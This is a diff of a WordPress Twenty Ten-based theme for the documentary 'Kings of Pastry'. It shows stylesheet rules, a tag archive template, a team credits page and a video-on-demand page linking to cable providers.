+#wp-calendar thead th {
+}
+#wp-calendar tbody {
+	color: #aaa;
+}
+#wp-calendar tbody td {
+	padding: 3px 0 2px;
+	background: #f5f5f5;
+	border:1px solid #fff;
+	text-align: center;
+}
+#wp-calendar tbody .pad {
+	background: none;
+}
+#wp-calendar tfoot #next {
+	text-align: right;
+}
+.widget_rss a.rsswidget {
+	color: #000;
+}
+.widget_rss a.rsswidget:hover {
+	color: #FF4B33;
+}
+.widget_rss .widget-title img {
+	height: 11px;
+	width: 11px;
+}
+
+/* Main sidebars */
+#main .widget-area ul {
+	margin-left: 0;
+	padding: 0 20px 0 0;
+}
+#main .widget-area ul ul {
+	border: none;
+	margin-left: 1.3em;
+	padding: 0;
+}
+#primary {
+}
+#secondary {
+}
+
+/* Footer widget areas */
+#footer-widget-area {
+}
+
+
+
+/* =Footer
+-------------------------------------------------------------- */
+
+#footer {
+	margin-bottom: 0px;
+}
+#colophon {
+	border-top: 2px solid #7a95ab;
+	margin-top: 25px;
+	padding: 5px 0 10px;
+	overflow: hidden;
+}
+#site-info {
+	font-weight: normal;
+}
+#site-info a {
+	color: #7a95ab;
+	text-decoration: none;
+	font-size: 11px;
+}
+#site-generator {
+	position: relative;
+}
+#site-generator a {
+	color: #7a95ab;
+	float: right;
+	text-decoration: none;
+	font-size: 10px;
+
+}
+#site-generator a:hover {
+	text-decoration: none;
+}
+img#wpstats {
+	display:block;
+	margin: 0 auto 10px;
+}
+
+
+
+/* added to hide comment not enabled */
+span.comments-link {
+	display:none;
+}
+
+
+/* Mobile Safari ( iPad, iPhone and iPod Touch )
+-------------------------------------------------------------- */
+
+pre {
+	-webkit-text-size-adjust: 140%;
+}
+
+code {
+	-webkit-text-size-adjust: 160%;
+}
+
+#access, .entry-meta, .entry-utility, .widget_search label, .navigation, .widget-area {
+	-webkit-text-size-adjust: 120%;
+}
+
+#site-description {
+	-webkit-text-size-adjust: none;
+}
+
+
+
+/* =Print Style
+-------------------------------------------------------------- */
+
+@media print {
+	body {
+		background:none !important;
+	}
+	#wrapper {
+		float: none !important;
+		clear: both !important;
+		display: block !important;
+		position: relative !important;
+	}
+	#header {
+		
+		padding-bottom: 18pt;
+	}
+	#site-title, #site-description {
+		float: none;
+		margin: 0;
+	}
+	#site-title {
+		font-size: 13pt;
+	}
+	.entry-content {
+		font-size: 14pt;
+		line-height: 1.6em;
+	}
+	.entry-title {
+		font-size: 21pt;
+		line-height: 1.4em;
+	}
+	#access,
+	#branding img,
+	#respond,
+	.comment-edit-link,
+	.edit-link,
+	.navigation,
+	.page-link,
+	.widget-area {
+		display: none !important;
+	}
+	#branding img.wp-post-image {
+		display: block !important;
+	margin-left: -104pt;
+	margin-top: 20pt;
+	border: none;
+	margin-bottom: -24pt;
+	}
+	#container, #header, #footer {
+		margin: 0 0 0 24%;
+		width: 70%;
+	}
+	#content {
+		margin: 24pt 0 0;
+	}
+	.wp-caption p {
+		font-size: 11pt;
+	}
+	#site-info,
+	#site-generator {
+		float: none;
+		width: auto;
+	}
+	#colophon {
+		width: auto;
+	}
+	img#wpstats {
+		display:none
+	}
+	#site-generator a {
+		padding: 0;
+	margin: 0;
+	}
+	#entry-author-info {
+		border: 1px solid #e7e7e7;
+	}
+	#main {
+		margin: 0;
+		width: auto;
+		padding: 0;
+	}
+	.home .sticky {
+		border: none;
+	}
+}
+

+ 35 - 0
tag.php

@@ -0,0 +1,35 @@
+<?php
+/**
+ * The template used to display Tag Archive pages
+ *
+ * @package WordPress
+ * @subpackage Twenty Ten
+ * @since 3.0.0
+ */
+?>
+
+<?php get_header(); ?>
+
+		<div id="container">
+			<div id="content">
+
+<?php the_post(); ?>
+
+				<h1 class="page-title"><?php
+					printf( __( 'Tag Archives: %s', 'twentyten' ), '<span>' . single_tag_title( '', false ) . '</span>' );
+				?></h1>
+
+<?php rewind_posts(); ?>
+
+<?php
+/* Run the loop for the tag archive to output the posts
+ * If you want to overload this in a child theme then include a file
+ * called loop-tag.php and that will be used instead.
+ */
+ get_template_part( 'loop', 'tag' );
+?>
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_sidebar(); ?>
+<?php get_footer(); ?>

+ 85 - 0
team.php

@@ -0,0 +1,85 @@
+<?php
+/**
+ * Template Name: Team
+ */
+?>
+<?php get_header(); ?>
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<?php the_post(); ?>
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					<div class="hide">
+						<div class="entry-content">
+							<h3>The Team</h3>
+							<img src="<?php bloginfo( 'template_url' ); ?>/images/macoroons.jpg" width="300"/>
+							
+							<h3><a href="<?php echo home_url( '/' ); ?>team">Team Bios</a></h3>
+							<div class="separator"><img src="<?php bloginfo( 'template_url' ); ?>/images/separator_sb.png"/>
+								</div>
+							<br />
+							<div class="roster">
+							<p>Directors</p>
+							<p>Chris Hegedus</p>
+							<p>D A Pennebaker</p>
+							<br />
+							<p>Executive Producer</p>
+							<p>Frazer Pennebaker</p>
+
+							<br />
+							<p>Producers</p>
+							<p>Frazer Pennebaker</p>
+							<p>Flora Lazar</p>
+								<br />
+							<p>Associate Producers</p>
+							<p>Rebecca Lando</p>
+							<p>Patricia Soussloff</p>
+								<br />
+							<p>Camera, Sound, Editing</p>
+							<p>Chris Hegedus</p>
+							<p>D A Pennebaker</p>
+							
+							<br />
+							<p>Additonal Camera</p>
+							<p>Nick Doob</p>
+							<br />
+							<p>Featuring</p>
+							<p>Sebastien Canonne, M.O.F.</p>
+							<p>Jacquy Pfeiffer</p>
+							<p>Rachel Beaudry</p>
+							<p>Philippe Rigollot</p>
+							<p>Stephane Glacier, M.O.F.</p>
+							<p>Regis Lazard</p>
+							<p>Frederique Lazard</p>
+							<p>Philippe Urraca, MOF</p>
+							<br />
+							<p>Musicians</p>
+							<p>Alex Toledano, Music Supervisor</p>
+							<p>Sebastien Giniaux, composor</p>
+							<p>Guillaume Singer</p>
+							<p>Jeremie Arranger</p>
+							<p>Corentin Giniaux</p>
+							
+							<br />
+							<p>A co-production with</p>
+							<p>BBC</p>
+							<p>Nick Frazer</p> 
+							<p>executive producer</p>
+							<p>VPRO</p>
+							<p>Barbara Truyen </p>
+							<p>commissioning editor</p>
+							<br />
+							<p>Generous Support</p>
+							<p>The Richard H. Driehaus Charitable Lead Trust</p>
+							<p>The Florence Gould Foundation</p>
+							<p>The Grand Marnier Foundation</p>
+							
+							</div>
+						</div><!-- .entry-content -->
+					</div>
+					
+					<?php the_content(); ?>
+				</div><!-- #post-<?php the_ID(); ?> -->
+			</div><!-- #content -->
+		</div><!-- #container -->
+
+<?php get_footer(); ?>

+ 32 - 0
vod.php

@@ -0,0 +1,32 @@
+<?php
+/**
+ * Template Name: VOD
+ */
+?>
+<?php get_header(); ?>
+		<div id="container" class="onecolumn">
+			<div id="content">
+				<?php the_post(); ?>
+				<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
+					
+							<h3 class="light" align="center">Now available through video-on-demand</h3>
+							<br />
+								<a href=""><img src="<?php bloginfo( 'template_url' ); ?>/images/vod.jpg" width="668" height="478" border="0" id="vod" usemap="#m_vod" alt="" /></a>
+								<map name="m_vod" id="m_vod">
+								<area shape="rect" coords="463,257,653,352" href="http://www.rcn.com/new-york/digital-cable-tv/digital-extras/on-demand-movies" target="_blank" alt="" />
+								<area shape="rect" coords="463,372,653,467" href="http://mediacomcable.com/cable_ppv.html" target="_blank" alt="" />
+								<area shape="rect" coords="242,372,432,467" href="http://www.suddenlink.com/television/" target="_blank" alt="" />
+								<area shape="rect" coords="242,251,432,346" href="http://www.myinsight.com/Product-Cable-OND.asp" target="_blank" alt="" />
+								<area shape="rect" coords="19,372,209,467" href="http://www.bresnan.com/services/digital_cable_with_on_demand/on_demand" target="_blank" alt="" />
+								<area shape="rect" coords="18,14,208,109" href="http://xfinitytv.comcast.net/ondemand/browse#pageType=search&term=kings%20of%20pastry&pageNum=1" target="_blank" alt="" />
+								<area shape="rect" coords="20,253,210,348" href="http://uverseonline.att.net/uverse/ondemand " target="_blank" alt="" />
+								<area shape="rect" coords="20,135,210,230" href="http://www.cox.com/digitalcable/ondemand/default.asp" target="_blank" alt="" />
+								<area shape="rect" coords="242,135,432,230" href="http://tvlistings.optimum.net/search.jsp?query=on%20demand&cat=Movies+On+Demand" target="_blank" alt="" />
+								<area shape="rect" coords="466,136,656,231" href="http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Video+On+Demand/QuestionsOne/84853.htm" target="_blank" alt="" />
+								<area shape="rect" coords="464,15,654,110" href="http://www.charter.net/vod/index.php?page=vod" target="_blank" alt="" />
+								<area shape="rect" coords="241,15,431,110" href="http://www.twondemand.com/movies/kings-of-pastry" target="_blank" alt="" />
+								</map>
+				</div><!-- #post-<?php the_ID(); ?> -->
+			</div><!-- #content -->
+		</div><!-- #container -->
+<?php get_footer(); ?>

Some files were not shown because too many files changed in this diff